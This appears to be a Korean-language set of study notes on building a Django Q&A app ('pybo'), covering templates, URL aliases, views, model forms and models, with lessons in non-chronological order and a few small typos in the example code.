extends 'base.html'은 base.html을 가져와서 block으로 지정해 놓은 부분을 base.html body에 정의한 block content에 넣어주는 것이다.

3) question_detail.html 질문 상세 템플릿 수정

{% extends 'base.html' %}

{% block content %}
<div class="container my-3">
    <h2 class="border-bottom py-2">{{ question.subject }}</h2>

    <div class="card my-3">
        <div class="card-body">
            <div class="card-text" style="white-space: pre-line;">
                {{ question.content }}
            </div>
            <div class="d-flex justify-content-end">
                <div class="badge badge-light p-2">
                    {{ question.create_date }}
                </div>
            </div>
        </div>
    </div>

    <h5 class="border-bottom my-3 py-2">
        {{ question.answer_set.count }}개의 답변이 있습니다.
    </h5>
    {% for answer in question.answer_set.all %}
    <div class="card my-3">
        <div class="card-body">
            <div class="card-text" style="white-space: pre-line;">
                {{ answer.content }}
            </div>
            <div class="d-flex justify-content-end">
                <div class="badge badge-light p-2">
                    {{ answer.create_date }}
                </div>
            </div>
        </div>
    </div>
    {% endfor %}

    <form action="{% url 'pybo:answer_create' question.id %}" method="post" class="my-3">
        {% csrf_token %}
        <div clas="form-group">
            <textarea name="content" id="content" rows="15" class="form-control"></textarea>
        </div>
        <input type="submit" value="답변 등록" class="btn btn-primary"/>
    </form>
</div>
{% endblock %}

위 질문 목록 템플릿 코드 수정과 같은 방식으로 추가한다.

4. 질문 등록 기능 추가

1) 질문 목록 페이지(question_list.html)에 질문 동록 버튼 추가

{% extends  'base.html' %}

{% block content %}
<div class="container my-3">
    <table class="table">
        <thead>
            <tr class="thead-dark">
                <th>번호</th>
                <th>제목</th>
                <th>작성일시</th>
            </tr>
        </thead>
        <tbody>
            {% if question_list %}
                {% for question in question_list %}
                    <tr>
                        <td>{{ forloop.counter }}</td>
                        <td>
                            <a href="{% url 'pybo:detail' question.id %}">
                            {{ question.subject }}
                            </a>
                        </td>
                        <td>{{ question.create_date }}</td>
                    </tr>
                {% endfor %}
            {% else %}
                <tr>
                    <td colspan="3">질문이 없습니다.</td>
                </tr>
            {% endif %}
        </tbody>
    </table>
    <a href="{% url 'pybo:question_create' %}" class="btn btn-primary">
        질문 등록하기
    </a>
</div>
{% endblock%}

새로운 별칭을 사용했으므로 URL 맵핑해야 한다.

2) pybo\urls.py에 URL 맵핑

from django.urls import path
from . import views         # 현재 패키지에서 views 모듈을 가져옴

app_name = 'pybo'

urlpatterns = [
    path('', views.index, name = 'index'),
    path('<int:question_id>/', views.detail, name = 'detail'),
    path('answer/create/<int:question_id>', views.answer_create, name='answer_create'),
    path('question/create', views.question_create, name='question_create') # 추가
]

3) pyob\views.py에 question_create 메서드 추가

from django.shortcuts import render, get_object_or_404, redirect
from .models import Question
from .forms import QuestionForm        #추가
from django.utils import timezone

def index(request):
    question_list = Question.objects.order_by('-create_date')
    context = { 'question_list': question_list }

    return render(request, 'pybo/question_list.html', context)


def detail(request, question_id): 
    # question = Question.objects.get(id=question_id)
    question = get_object_or_404(Question, pk=question_id)
    context = { 'question': question }

    return render(request, 'pybo/question_detail.html', context)


def answer_create(request, question_id):
    question = get_object_or_404(Question, pk=question_id)
    question.answer_set.create(content=request.POST.get('content'), create_date=timezone.now())

    return redirect('pybo:detail', question_id=question.id)


def question_create(request):    # 추가
    form = QuestionForm()
    return render(request, 'pybo/question_form.html', { 'form': form })

새로운 패키지를 추가했고, 아직 정의가 되어 있지 않기 때문에 정의를 해주어야 한다.

4) pybo\forms.py 생성

QuestionForm 클래스 추가

from django import forms
from pybo.models import Question

class QuestionForm(forms.ModelForm):
    class Meta:
        model = Question
        fields = ['subject', 'content']

• ModelForm을 상속받아 모델 폼을 정의
• 모델 폼은 반드시 Meta라는 내부 클래스를 정의해야 함
• 모델 폼에서 사용할 모델과 모델의 필드를 지정

model은 보여질 폼( QuestionForm) 하고 연결되는 모델이다.

fields는 그 모델이 가지고 있는 변수들을 의미하는데, 그 변수 중 어떤 것을 입력받게 할 것인가를 정의해 주는 것이다.

5) templates\pybo\question_form.html 추가

{% extends 'base.html' %}

{% block content %}
<div class="container">
    <h5 class="my-3 border-bottom pb-2">질문 등록</h5>
    <form method="post" class="post-form my-3">
        {% csrf_token %}
        {{ form.as_p }}                
        <button type="submit" class="btn btn-primary">저장하기</button> 
    </form>
</div>
{% endblock %}

• 모델 폼과 연결된 입력 항목(Mata 클래스의 field로 지정된 항목)에 값을 입력할 수 있는 코드를 자동 생성

6) 브라우저 화인

5. pybo\views.py에 question_create 메서드 수정

요청 방식에 따라 GET 방식인 경우 입력 화면을 반환, POST 방식인 경우 내용을 저장 후 리다이렉트

주소를 입력하거나, 링크를 눌러서 이동하는 것들은 GET 방식을 사용한다.

question_list.html에 정의한 주소로 가게 되어 있다. 그래서 질문 등록을 누르면 링크를 통해 이동하는 것이므로 GET 방식이 된다.

question_create에 요청은 GET 방식으로 들어오는 것이라고 할 수 있다.

그러나 저장하기를 누르면 question_form.html에 정의한 것처럼 POST 방식으로 전달한다. 

question_create 메서드가 GET 방식과 POST 방식 두 개가 공존한다.

그래서 GET 방식으로 들어왔을 때와 POST 방식으로 들어왔을 때를 구분해야 한다.

from django.shortcuts import render, get_object_or_404, redirect
from .models import Question
from .forms import QuestionForm
from django.utils import timezone

def index(request):
    question_list = Question.objects.order_by('-create_date')
    context = { 'question_list' : question_list }

    return render(request, 'pybo/question_list.html', context)

def detail(request, question_id) :
    # question = Question.objects.get(id=question_id)
    question = get_object_or_404(Question, pk=question_id)
    context = { 'question' : question }

    return render(request, 'pybo/question_detail.html', context)

def answer_create(request, question_id) :
    question = get_object_or_404(Question, pk=question_id)
    question.answer_set.create(content=request.POST.get('content'), create_date=timezone.now())

    return redirect('pybo:detail', question_id=question_id)

def question_create(request):    # 수정
    if request.method == 'GET':
        form = QuestionForm()
        return render(request, 'pybo/question_form.html', { 'form': form})
    elif request.method == 'POST' :
        # POST 방식으로 전달된 요청인 경우, 요청 본문을 통해 전달된 입력값을 저장 
        form = QuestionForm(request.POST)
        if form.is_valid():
            question = form.save(commit=False)
            question.create_date = timezone.now()
            question.save()
            return redirect('pybo:index')

• is_valid는 모델에 속성들이 정의되어 있는데 그 조건에 맞는지를 확인한다. 맞으면 save한다.
• form.save를 하면 QuestionForm에 있는 필드 값을 세팅해 준다.

commit=False는 저장할 때 세 가지 값 subject, content, datetime이 들어가야 하는데 사용자는 두 가지 값만 입력했기 때문에 시간을 추가 해주기 위해 DB에 반영하지 않고 임시저장을 하는 것이다.  

create_date를 추가해 주면서 네 가지 값이 모두 들어가 save를 하면 DB에 저장이 된다.

1) 브라우저 확인

6. 질문 입력 화면 스타일 적용

question_form.html에는 {{form.as_p}} 코드를 통해 폼 엘리먼트와 입력 항목을 자동으로 생성해 주기 때문에 스타일을 적용할 수 없다.

스타일을 적용하기 위해서는 모델 폼 파일(forms.py)에 내부 클래스 Meta에서 widgets와 labels 속성을 이용해 스타일을 적용할 수 있다.

from django import forms
from pybo.models import Question

class QuestionForm(forms.ModelForm):
    class Meta:
        model = Question
        fields = ['subject', 'content']
        widgets = {
            # <input type="text" name="subject" maxlength="200" required id="id_subject" class="form-control">
            'subject': forms.TextInput(attrs={'class': 'form-control'}), 
            # <textarea name="content" cols="40" rows="10" required id="id_content" class="form-control">
            'content': forms.Textarea(attrs={'class': 'form-control', 'rows': 10}),
        }
        labels = {
            'subject': '제목', 
            'content': '내용',
        }

subject와 content는 주석과 같이 설정된다.

저장 후 브라우저 실행하면 바뀐 것을 확인할 수 있다.

Django 템플릿 언어

• 변수
  • {{ 변수 }}
• 필터
  • 변수의 값을 특정 형식으로 변환할 때 사용
  • 변수 다음에 | (파이프)를 넣어서 필터를 명시
  • 필터는 : 문자를 통해 인자를 받을 수 있음
  • {{ text | escape | lineberaks }}
  • {{ text | truncatewords:30 }}
  • {{ text | default:"default value" }} 
  • {{ text | length }}  {{ text | upper }}
• 태그
  • {% 태그 %}
  • if 문 또는 for 문처럼 흐름을 제어하기 위해 사용
  • {% extends %}와 같이 단독으로 사용하는 템플릿 태그
  • {% if %} {% endif %}처럼 반듯이 닫아줘야 하는 템플릿 태그 
• 주석
  • 주석 처리할 때 사용 
  • {# 한 줄 주석 #} 
  • {% comment %} 
    여러 줄 주석 
    {% endcomment %} 

• pybo\views.py

def index(request):
    question_list = Question.objects.order_by('-create_date')
    context = { 'question_list' : question_list }
    
    return render(request, 'pybo/question_list.html', context)     # context를 question으로 전달

• templates\pybo\question_list.html

{% if question_list %}   # 뷰에서 전달받은 question_list가 있다면
    <ul>
        {% for question in question_list %}           # 뷰의 context 변수에 정의한 키 이름 
            <li><a href="/pybo/{{ question.id }}/">{{ question.subject }}</a></li>
        {% endfor %}                                  # 아이디와 제목을 하나씩 출력하는 반복문   
    </ul>
{% else %}
    <p>질문이 없습니다.</p>
{% endif %}

<br<

2. 질문 상세 기능 구현

1) pybo/에서 질문 목록 클릭

오류 발생

/pybo/숫자/ 형식의 URL 패턴이 정의되어 있지 않아서 질문을 클릭하면 상세 페이지로 넘어가지 못한다.

질문을 클릭했을 때 상세 페이지로 갈 수 있도록 기능을 구현한다.

2) pybo\urls.py 파일에 패턴 추가

from django.urls import path
from . import views         # 현재 패키지에서 views 모듈을 가져옴

urlpatterns = [
    path('', views.index),
    path('<int:question_id>/', views.detail),    # 추가
]

게시물을 눌렀을 때 숫자마 들어오는데 이 숫자는 고정되어 있는 게 아니다. 변하는 값을 어떻게 넣는지 알 수 있다.

(<타입:받을_변수>, 모듈.함수) 이 구문은 변하는 타입의 값을 받아서 views 모델에 있는 detail 함수로 보내는 구문이다.

3) pybo\views.py 파일에 detail 메서드 추가

from django.shortcuts import render
from .models import Question

def index(request):
    question_list = Question.objects.order_by('-create_date')
    context = { 'question_list' : question_list }

    return render(request, 'pybo/question_list.html', context)

def detail(request, question_id) :                    # 메서드 추가
    question = Question.objects.get(id=question_id)
    context = { 'question ' : question }

    return render(request, 'pybo/question_detail.html', context)

detail 함수는 path에서 받은 question_id를 받는다. 이 id에 대한 question 값을 받아올 수 있다. Question 객체에서 get을 사용하는데 이 get은 하나만 가져올 때 사용한다. 이때 id는 매개변수로 받은 question_id를 사용한다.

이 받은 것을 화면으로 출력을 해줘야 하는데 딕셔너리는 사용해 정의한다. 이 값을 화면을 어떻게 출력할 것인지 정해놓은 템플리에 다시 보내주어야 우리가 원하는 방식대로 출력되기 때문에 render 함수를 사용해 question_detail.html로 context 변수를 보내주는 것이다.

4) templates\pybo\question_detail.html 템플릿 정의

<h1>{{ question.subject }}</h1>

<div>
    {{ question.content }}
</div>

간단하게 질문의 제목과 내용을 받아서 출력한다.

5) 브라우저 확인

위에서 오류 페이지가 나왔지만 다시 잘 나오는 것을 확인할 수 있다.

3. get_object_or_404 메서드 활용

존재하지 않는 데이터를 조회하는 오류 발생

존재하지 않는 데이터를 조회하면 오류가 발생하는데 오류 메시지에 시스템(프로그램) 내부 구조 및 로직이 포함되어 출력된다. 

공격자는 오류 메시지를 통해 정보를 수집해 추가 공격 계획을 쉽게 할 수 있다.

오류 메시지를 내부 정보가 포함되지 않는 단순한 메시지로 출력하기 위해서는 get_object_or_404 메서드를 활용한다.

1) get 메서드를 get_objcet_or_404 메서드로 대체

모델의 기본키를 이용해서 모델 객체 한 것을 반환

from django.shortcuts import render, get_object_or_404
from .models import Question

def index(request):
    question_list = Question.objects.order_by('-create_date')
    context = { 'question_list' : question_list }

    return render(request, 'pybo/question_list.html', context)

def detail(request, question_id) :
    # question = Question.objects.get(id=question_id)            # 주석
    question = get_object_or_404(Question, pk=question_id)        # 추가
    context = { 'question' : question }

    return render(request, 'pybo/question_detail.html', context)

get_object_or_404()는 첫 번째 인자로 모델을 넣어주고, 몇 개의 키워드 인수를 모델 관리자의 get() 함수에 넘긴다.

여기서는 pk=question_id를 넘겼는데 Question 모델에서 question_id를 가져오는 것이다.

(1) 존재하는 데이터를 조회한 경우

(2) 존재하지 않는 데이터를 조회한 경우

이전에 존재하지 않은 데이터를 조회했을 때는 자세한 오류 메시지가 출력 됐지만, get_object_or_404를 사용해 내부 정보가 포함되지 않는 단순한 오류 메시지가 출력되도록 수정했다.

4. URL 맵핑 정보에 별칭 사용

1) question_list.html 템플릿

<li><a href="/pybo/{{ question.id }}/">{{ question.subject }}</a></li>

• 질문 목록에서 제목(링크)을 클릭했을 때 이동하는 주소

주소가 하드 코딩 되어 있어 변경을 일관되고 쉽게 반영하기 어렵다. 이 패턴은 여러 군데 사용될 수 있는데 id가 아니고 name, subject 또는 어떤 무언가가 와서 패턴이 바뀌면 여러 군데 사용한 모든 것을 다 찾아서 수정을 해주어야 한다.

URL의 주소 패턴 바뀌더라도 이를 쉽게 반영하기 위해서는 별칭을 사용한다.

2) pybo\urls.py 파일에 URL 별칭 추가

from django.urls import path
from . import views         # 현재 패키지에서 views 모듈을 가져옴

urlpatterns = [
    path('', views.index, name = 'index'),
    path('<int:question_id>/', views.detail, name = 'detail'),
]

• /pybo/ 형식의 주소에 index라는 이름을 부여
• /pybo/숫자/ 형식의 주소에 detail라는 이름을 부여

3) templates\pybo\question_list.html 템플릿 파일을 URL 별칭을 사용하도록 수정

{% if question_list %}
    <ul>
        {% for question in question_list %}
            {# <li><a href="/pybo/{{ question.id }}/">{{ question.subject }}</a></li> #}
            <li><a href="{% url 'detail' question.id %}">{{ question.subject }}</a></li>
        {% endfor %}
    </ul>
{% else %}
    <p>질문이 없습니다.</p>
{% endif %}

'detail'은 별칭이다. 이 detail은 방금 위에서 설정한 형식을 가진다. detail에서 설정한 형식은 pybo/숫자가 나오는 형식인데 이때 받는 숫자는 question_id가 된다. 

직접적으로 정의하는 게 아니고 정의된 형식을 urls에서 가져와서 사용하는 것이다.

4) URL 네임스페스

서로 다른 앱세서 같은 URL 별칭을 사용하면 중복 문제가 발생
네임스페이스(namespace : 각각의 앱이 관리하는 독립된 이름 공간)를 적용해서 해결 가능

(1) pybo\urls.py 파일에 네임스페이스 이름을 값으로 가지는 app_name 변수 추가

from django.urls import path
from . import views        # 현재 패키지에서 views 모듈을 가져옴

app_name = 'pybo'        # 추가

urlpatterns = [
    path('', views.index, name = 'index'),
    path('<int:question_id>/', views.detail, name = 'detail'),
]

여기서 index와 detail은 pybo의 index, detail이다. 그런데 test라는 애플리케이션이 있을 때, test 애플리케이션 안에서 별칭을 위 코드와 똑같이 사용하면 question_list.html 템플릿 url 'detail'에서 pybo의 detail인지 test의 detail인지 알 수가 없다.

그래서 이것을 구분하기 위해서 네임스페이스를 사용한다.

위 코드만 적용하고 실행하면 오류가 발생한다. 그 이유는 템플릿에 사용된 별칭의 네임스페이스를 정의하지 않았기 때문이다. 

(2) templats\pybo\question_list.html 파일에서 사용하고 있는 별칭의 네임스페이를 지정

{% if question_list %}
    <ul>
        {% for question in question_list %}
            {# <li><a href="/pybo/{{ question.id }}/">{{ question.subject }}</a></li> #}
            <li><a href="{% url 'pybo:detail' question.id %}">{{ question.subject }}</a></li>
        {% endfor %}
    </ul>
{% else %}
    <p>질문이 없습니다.</p>
{% endif %}

• pybo:detail로 수정

위 detail은 pybo 네임스페이스 것이다라고 알려주는 것이다.

5. 답변 저장 및 출력 기능을 추가

1) 질문 상세 페이지(templates\pybo\question_detail.html)에 답변 등록 버튼 추가

<h1>{{ question.subject }}</h1>

<div>
    {{ question.content }}
</div>

<form action="{% url 'pybo:answer_create' question_id %}" method="post">  {# 추가 #}
    {% csrf_token %}
    <textarea name="content" id="content" rows="15"></textarea>
    <input type="submit" value="답변 등록"/>
</form>

• form이라는 것은 form 태그 안에 있는 입력창, 선택창 등의 값을 서버로 전달하는 역할을 한다.
• pybo : answer_create    -  pybo에 새로운 별칭 answer_create 추가

사용자의 입력을 서버에 전달하기 위해서는 반드시 fomr 태그를 사용해야 한다. 여기서 "서버에"라는 말은 'action'이 된다.

'action'에는 사용자의 입력이 어느 서버에 어느 페이지에 전달할 것인가를 지정하는 것이다. 이는 바로 URL이라고 한다.

지정된 URL 주소로 입력값을 전달하라고 지정한다. 이때 어떤 방식으로 전달할 것인가는 'method'가 된다.

방식에는 전달하는 요청을 서버에서 어떻게 처리할 것인가를 명시하는 것을 말한다. 생성, 조회, 수정, 삭제 등이 될 수 있다.

조회할 때는 get 또는 post를 사용한다. get은 주소 뒤에 입력 돼 값이 붙어서 가는 방식이고, post  방식은 주소가 아닌 요청 본문에 그 데이터들이 들어가는 방식이다.

사용자가 textarea에 입력한 내용을 서버에 전달한다. 서버로 전달할 때 id, class는 아무런 역할을 하지 않는다.

id와 class는 브라우저 안에서 어떤 태그가 있다면 그 태그를 관리하기 위한 용도로 사용한다. 관리한다는 것은 그것들을 식별해서 조회하고 수정하기 위한 것이다. 또한 JS로 제어를 하거나 CSS 등으로 스타일을 적용할 때 id나 class를 사용한다. 

간단하게 말해서 id와 class는 브라우저 안에서 그 값들을 식별하기 위해서 사용한다.

name은  입력되는 값을 서버로 전달할 때 서버에서 그 값을 추출하기 위해 용도로 사용한다. name은 서버로 전달했을 때 서버에서 식별하기 위해서 사용한다. 

name과 id의 차이점이 있다는 것을 알아야 한다.

'submit'은 submit이 클릭이 되면 form에서 입력된 값을 action에 기술된 주소로 서버로 보내라는 것이다.

 csrf_token은 csrf 취약점을 방어하기 위한 기법 중 하나인데, 정상적인 절차에 의해서 요청이 이루어졌다는 것을 보장하는 기능이다.

새로운 별칭을 추가했고 URL 맵핑이 정의되지 않았기 때문에 이대로 실행하면 오류가 발생한다. 

2) pybo\urls.py 파일에 URL 맵핑 등록

from django.urls import path
from . import views

app_name = 'pybo'

urlpatterns = [
    path('', views.index, name='index'),
    path('<int:question_id>/', views.detail, name="detail"),
    path('answer/create/<int:question_id>', views.answer_create, name='answer_create'),
]

맵핑을 했으면 주소만 있는 것이기 때문에 화면으로 보일 views를 정의해야 한다.

3) pybo\views.py 파일에 answer_create 메서드 추가

from django.shortcuts import render, get_object_or_404, redirect    #추가
from .models import Question
from django.utils import timezone    #추가

def index(request):
    question_list = Question.objects.order_by('-create_date')
    context = { 'question_list' : question_list }

    return render(request, 'pybo/question_list.html', context)

def detail(request, question_id) :
    # question = Question.objects.get(id=question_id)
    question = get_object_or_404(Question, pk=question_id)
    context = { 'question' : question }

    return render(request, 'pybo/question_detail.html', context)

def answer_create(request, question_id) :    # 추가
    question = get_object_or_404(Question, pk=question_id)
    question.answer_set.create(content=request.POST.get('content'), create_date=timezone.now())

    return redirect('pybo:detail', question_id=question_id)

• 답변을 추가할 질문을 조회
• 답변 추가 후 상세 페이지로 리다이렉트

POST 방식으로 전달된 요청 객체에서 content라는 이름의 값을 가져오는 것이다. 이 content는 사용자가 입력한 값 중에서 이름이 content인 값을 가져오는 것이다. 

content는 위 question_detail.html에 textarea 태그 안에 name = 'content'에 연결되어 있다.

redirect는 요청을 다른 요청으로 바꾸는 것이다.

저장 버튼을 누르면 answer_create를 호출하면 DB에 저장을 하고 결과를 내려준다. 이때 결과는 redirect인데 detail 페이지로 다시 요청하라는 뜻으로  detail 페이지로 다시 요청하고 그 결과에 맞춰 화면에 출력해 준다.

그런데 이때 DB에 저장 후 detail로 다시 요청해 달라는 리턴을 받고 detail로 다시 요청을 할 때는 사용자가 관여하는 게 아니고 브라우저가 알아서 처리해 준다. 응답 헤더에 있는 로케이션 헤더의 값을 이용해서 자동으로 이루어지는 이 과정을 redirect라고 한다.

저장, 수정, 삭제가 되면 서버 사이드의 변경을 클라이언트가 다시 요청을 해야만 볼 수 있다. 웹은 클라이언트가 요청을 하지 않으면 응답을 받을 수 없는 구조이다.

4)  templates\pybo\queston_detail.html 파일에 답변을 출력하도록 수정

<h1>{{ question.subject }}</h1>

<div>
    {{ question.content }}
</div>

{# 답변 내용 출력 추가 #}    
<5>{{ question.answer_set.count }}개의 답변이 있습니다.</5>
<div>
    <ul>
        {% for answer in question.answer_set.all %}
            <li>{{ answer.content }}</li>
        {% endfor %}
    </ul>
</div>

<form action="{% url 'pybo:answer_create' question_id %}" method="post">
    {% csrf_token %}
    <textarea name="content" id="content" rows="15"></textarea>
    <input type="submit" value="답변 등록"/>
</form>

위에서 함수 set.all을 입력했는데 이전에는 set.all() 괄호를 사용해 주었다. 이것은 장고 템플릿 문법에서는 괄호를 빼고 사용한다. 마치 속성을 그대로 쓰듯이 사용한다.

6. 위 5번 기능을 브라우저를통해 확인

1) pybo 앱 생성

• django-admin startapp pybo 생성
• tree .\pybo /f  생성된 파일 확인

설치 후 앱 생성까지 다 끝나서 개발 서버로 들어가면 되지만 URL을 정의하지 않아서 오류가 난다.

2) URL 맵핑

• config\urls.py 파일에 path() 함수를 사용해서 URL과 요청을 처리할 함수 연결
• from pybo import views
• path('pybo/', views.index),

from django.contrib import admin
from django.urls import path
from pybo import views

urlpatterns = [
    path('admin/', admin.site.urls),
    path('pybo/', views.index),
]

pybo 아래에 있는 views 모듈 안에 index 함수를 불러오는 path를 추가하는 것이다.

위 코드를 저장하면 views.index 함수가 정의되지 않아서 오류가 발생한다.

File "C:\Users\crpark\AppData\Local\Programs\Python\Python312\Lib\importlib\__init__.py",
line 90, in import_module    return _bootstrap._gcd_import(name[level:], package,level)
                                                                                                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "<frozen importlib._bootstrap>", line 1387, in _gcd_import
File "<frozen importlib._bootstrap>", line 1360, in _find_and_load
File "<frozen importlib._bootstrap>", line 1331, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 935, in _load_unlocked
File "<frozen importlib._bootstrap_external>", line 995, in exec_module
File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
File "c:\python\projects\mysite\config\urls.py", line 22, in <module>        path('pybo/', views.index)
                       ^^^^^^^ AttributeError: module 'pybo.views' has no attribute 'index'

• 뷰 함수가 정의되지 않았기 때문에 오류가 발생

3) views 함수를 정의

• pybo\views.py 파일에 index() 함수 추가
• from django.http import HttpResponse

from django.http import HttpResponse

def index(request) :
    return HttpResponse("안녕하세요. PYBO에 온 것을 환영합니다.")

• HttpResponse는 요청에 대한 응답을 만들 때 사용하는 클래스

4) 서버 실행

• python manage.py runserver

5) 페이지 접속

• http://localhost:8000/pybo 로 접속

(1) 명령 프롬프트에서 curl로 접속

C:\Users\crpark> curl http://localhost:8000/pybo/ -v
* Trying [::1]:8000...                    ⇐ 개발 서버와 연결을 시도
* Trying 127.0.0.1:8000...
* Connected to localhost (127.0.0.1) port 8000
> GET /pybo/ HTTP/1.1               ⇐ 요청 시작
> Host: localhost:8000              ⇐ 요청 헤더 시작
> User-Agent: curl/8.4.0
> Accept: */*
>                            ⇐ 요청 헤더 끝 (GET 방식인 경우 요청 본문은 생략)
< HTTP/1.1 200 OK                              ⇐ 응답 시작
< Date: Fri, 08 Mar 2024 04:32:44 GMT    ⇐ 응답 헤더 시작
< Server: WSGIServer/0.2 CPython/3.12.2
< Content-Type: text/html; charset=utf-8
< X-Frame-Options: DENY
< Content-Length: 52
< X-Content-Type-Options: nosniff
< Referrer-Policy: same-origin
<                                             ⇐ 응답 헤더 끝
안녕하세요. PYBO에 온 것을 환영합니다.      ⇐ 응답 본문 ⇒ index 함수에서 HttpResponse 
* Connection #0 to host localhost left intact                       인스턴스 생성 시  입력한 문자열

curl로 접속하면 위와 같이 세부적으로 볼 수 있다.

2. URL 분리, 앱 별로 URL 맵핑을 관리

1) config\urls.py 수정

페이지를 100개를 만들었을 때, urls.py를 수정하지 않고 위 urls.py와 같은 방식으로 작성한다면 모든 페이지의 url를 다 적어 100 라인을 써야 하며 가독성이 떨어지기 때문에 관련된 앱 별로 관리할 수 있도록 수정을 한다.

• 장고 urls 패키지에 있는 include 모듈 추가 
• path('pybo/', include('pybo.urls'))로 수정

from django.contrib import admin
from django.urls import path, include
from pybo import views   

urlpatterns = [
    path('admin/', admin.site.urls),
    # path('pybo/', views.index),
    path('pybo/', include('pybo.urls'))  # 추가
]

pybo 패키지에 있는 urls 모듈을 참조해서 URL 맵핑을 처리한다.

pybo\urls.py 파일에 pybo/ 패턴의 요청을 처리할 URL 맵핑을 정의한 것이다.

2) pybo\urls.py 파일을 추가

from django.urls import path
from . import views         # 현재 패키지에서 views 모듈을 가져옴

urlpatterns = [
    path('', views.index),
]

http://localhost:8000/pybo/로 요청을 한다. 이때 웹 루트 아래에 있는 pybo를 해석하려고 할 때, 첫 번째로는 confing\urls.py에서 찾는다. 위 config\urls.py에서 수정한 패턴을 보면 pybo/를 찾는 것인데 include 함수를 통해 pybo\urls 내용을 가지고 오는 문장이기 때문에 pybo\urls.py를 추가한 것이다

pybo\urls.py의 path에서 보면 패턴이 ' '로 비어 있다. 비어 있다는 말은 http://localhost:8000/pybo/"   " 이곳 즉, pybo/ 다음에 아무것도 없다는 뜻으로 아무것도 없으면 views.index로 보내라는 것이다. 

만약 main, sub, page 이름의 페이지가 있다면 http://localhost:8000/pybo/main 이렇게 들어갈 것이다. 나머지도 main이 들어간 자리에 들어간다. 그래서 pybo/로 시작하고 그 밑에 무언가가 있다면 이 파일에 정의를 하면 된다.

3. config\settings.py  파일에서 설정 정보 확인

1) INSTALLED_APPS

기본 설치된 앱

• admin : 관리자 기능 
• auth  : 인증 
• contenttypes : 요청 응답에 나오는 내용 바이너리, xml, text
• sessions : 세션 관리
• messages : 메시지 관리
• staticfiles : 정적 관리 

2) DATABASES

장고 애플리케이션에서 사용하는 데이터베이스의 연결 정보

• sqlite3

3) migrate

config\settings.py에 있는 설정 정보를 반영하는 것

• migrate 명령어로 앱이 필요로 하는 테이블 생성

migrate를 하면 설정 정보에서 정의한 설정들의  테이블을 만들어 준다.

이 테이블들을 시각적으로 보기 위해서는 DB Browser for SQLite를 설치해야 한다.

4. DB Browser for SQLite 설치

설치는 기본 설정으로 설치하면 되는데 바로가기를 만드는 것을 추천한다. 바로가기가 없으면 설치 위차까지 찾아 들어가 실행해야 한다.

SQLite를 실행 장고 프로젝트 데이터베이스를 열어준다.

migrate으로 테이블을 만든 것을 시각적으로 볼 수 있다.

5. 모델 생성

데이터 정리하는 역할

from django.db import models

# 질문 모델 클래스를 정의
class Question(models.Model):
    # 질문 모델이 가지는 속성을 정의 
    subject = models.CharField(max_length=200)      # 글자 수 제한이 있는 데이터
    content = models.TextField()                    # 글자 수 제한이 없는 데이터
    create_date = models.DateTimeField()            # 날짜, 시간을 나타내는 데이터


# 답변 모델 클래스를 정의
class Answer(models.Model):
    # 답변 모델이 가지는 속성을 정의
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    content = models.TextField()
    create_date = models.DateTimeField()

Primary Key(PK)는 개별 데이터를 구분하기 위해 중복이 되지 않는 유일한 데이터를 말한다.

직원이 있다면 4번 직원, 학생이라면 학번, 대한민국 국민이라면 주민등록번호로 생각해면 쉽다.

Foreign Key(FK)는 PK와 다른 테이블에 존재하는데 PK에 종속적이고 참조하는 테이블의 PK와 연결되어 있다.

PK가 있는 테이블에서 데이터가 삭제되면 FK가 있는 테이블의 데이터는 의미가 없기 때문에 함께 삭제된다.

위 코드의 question은 질문이 없으면 답변도 없을 것이고, 질문이 삭제되면 같이 삭제가 되어야 하기 때문에 어느 질문의 답변인지 알려줘야 한다. 그래서 FK를 사용해서 Question에 종속되도록 작성한다.

6. pybo 앱 등록

config\settings.py에 pybo 등록

• INSTALLED_APPS에 'pybo.apps.PyboConfig', 추가

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'pybo.apps.PyboConfig',                # 추가
]

INSTALLED_APPS에 등록해 주어야 장고가 pybo 앱을 인식하고 데이터베이스 관련 작업을 수행할 수 있다.

앱을 등록했으니 테이블을 만들어 주어야 한다.

1) migrate 명령으로 테이블 생성

모델이 변경되지 않았거나 migration 파일이 준비되지 않아서 나오는 오류다. 

데이터베이스에 변화가 생기면 makemigrateion로 migrations 파일을 만들고 migrate을 해야 한다.

• makemigrations은 장고가 테이블 작업을 수행하기 위한 파일을 생성
• migrate는 실제 테이블을 생성

2) makemigrations 후 migrate 수행

• 0001_initial.py를 적용한 내용을 보여준다.
• 0001_initial은 Question, Answer 모델은 만든 것이다.
• migratinos 파일은 pybo\migrations 위치에 있다.

7. 데이터 생성, 저장, 조회, 삭제

1) 데이터 생성

장고 쉘을 통해 생성

• 장고 실행에 필요한 환경들을 자동으로 설정해서 실행하는 쉘 (python shell과는 다름)

>>> from pybo.models import Question, Answer
>>> from django.utils import timezone
>>> q = Question(subject='pybo가 무엇인가요?', content='pybo에 대해서 알려 주세요', create_date=timezone.now())
>>> q.save()

위와 같이 입력하면 SQLite에서 확인할 수 있다.

• id는 장고가 자동으로 넣어주는 필드

>>> q = Question(subject='두 번째 질문입니다.', content='ID는 자동으로 생성되나요?', create_date=timezone.now())
>>> q.save()
>>> q.id

2) 데이터 조회

빨간색 박스 안에 있는 숫자는 위에서 말했듯이 장고가 Question 모델 데이터에 자동으로 입력한 ID 값이다.

(1) 모델 데이터 조회 결과 출력 정보 변경

pybo\models.py

데이터를 조회하면 기본적으로 ID 출력되는 것을 봤다. ID를 출력하면 무슨 내용의 질문인지 알기 어렵다.

어떤 질문인지 일기 위해 제목이 출력되도록 변경을 한다.

from django.db import models

# 질문 모델 클래스를 정의
class Question(models.Model) :
    # 질문 모델이 가지는 속성을 정의 
    subject = models.CharField(max_length = 200)    #CharField - 글자 수 제한 
    content = models.TextField()                    # 글자 수 제한 없는 데이터
    create_date = models.DateTimeField()            # 날짜, 시간을 나타내는 데이터

    def __str__(self) :                             # 제목을 반환
        return self.subject

# 답변 모델 클래스를 정의
class Answer(models.Model) :
    # 답변 모델이 가지는 속성을 정의
    question = models.ForeignKey(Question, on_delete = models.CASCADE)  
    content = models.TextField()
    create_date = models.DateTimeField()

• def __str__(self) : 정의

